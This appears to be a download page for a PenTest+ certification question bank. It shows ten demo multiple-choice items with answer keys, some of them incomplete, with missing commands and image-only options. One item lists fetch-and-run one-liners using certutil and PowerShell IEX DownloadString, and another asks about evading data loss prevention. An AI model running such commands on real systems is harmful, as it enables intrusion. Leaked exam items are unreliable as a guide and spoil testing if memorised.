Download CompTIA PenTest-Certification Exam.PT0-003.ExamTopics.2026-03-05.206q.tqb

Vendor: CompTIA
Exam Code: PT0-003
Exam Name: CompTIA PenTest-Certification Exam
Date: Mar 05, 2026
File Size: 3 MB

How to open TQB files?

Files with TQB (Taurus Question Bank) extension can be opened by Taurus Exam Studio.

Demo Questions

Question 1
A penetration tester is evaluating the security of a corporate client’s web application using federated access. Which of the following approaches has the least possibility of blocking the IP address of the tester’s machine?
  1. [image]
  2. [image]
  3. [image]
  4. [image]
Correct answer: B
Question 2
A penetration tester is trying to get unauthorized access to a web application and executes the following command:
Which of the following web application attacks is the tester performing?
  1. Insecure direct object reference
  2. Cross-site request forgery
  3. Directory traversal
  4. Local file inclusion
Correct answer: C
Question 3
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?
  1. powershell.exe impo C:\tools\foo.ps1
  2. certutil.exe -f https://192.168.0.1/foo.exe bad.exe
  3. powershell.exe -noni -encode IEX.DownloadString("http://172.16.0.1/")
  4. rundll32.exe c:\path\foo.dll,functName
Correct answer: D
Question 4
Which of the following techniques is the best way to avoid detection by data loss prevention tools?
  1. Encoding
  2. Compression
  3. Encryption
  4. Obfuscation
Correct answer: D
Question 5
A penetration tester writes a Bash script to automate the execution of a ping command on a Class C network:
Which of the following pieces of code should the penetration tester use in place of the --MISSING-TEXT-- placeholder?
  1. crunch 1 254 loop
  2. seq 1 254
  3. echo 1-254
  4. {1..254}
Correct answer: D
Question 6
A penetration tester needs to exploit a vulnerability in a wireless network that has weak encryption in order to perform traffic analysis and decrypt sensitive information. Which of the following techniques would best allow the penetration tester to have access to the sensitive information?
  1. Bluejacking
  2. SSID spoofing
  3. Packet sniffing
  4. ARP poisoning
Correct answer: C
Question 7
During an assessment, a penetration tester obtains access to an internal server and would like to perform further reconnaissance by capturing LLMNR traffic. Which of the following tools should the tester use?
  1. Burp Suite
  2. Netcat
  3. Responder
  4. Nmap
Correct answer: C
Question 8
A penetration tester identifies the URL for an internal administration application while following DevOps team members on their commutes. Which of the following attacks did the penetration tester most likely use?
  1. Shoulder surfing
  2. Dumpster diving
  3. Spear phishing
  4. Tailgating
Correct answer: A
Question 9
During an assessment, a penetration tester plans to gather metadata from various online files, including pictures. Which of the following standards outlines the formats for pictures, audio, and additional tags that facilitate this type of reconnaissance?
  1. EXIF
  2. GIF
  3. COFF
  4. ELF
Correct answer: A
Question 10
Which of the following elements in a lock should be aligned to a specific level to allow the key cylinder to turn?
  1. Latches
  2. Pins
  3. Shackle
  4. Plug
Correct answer: B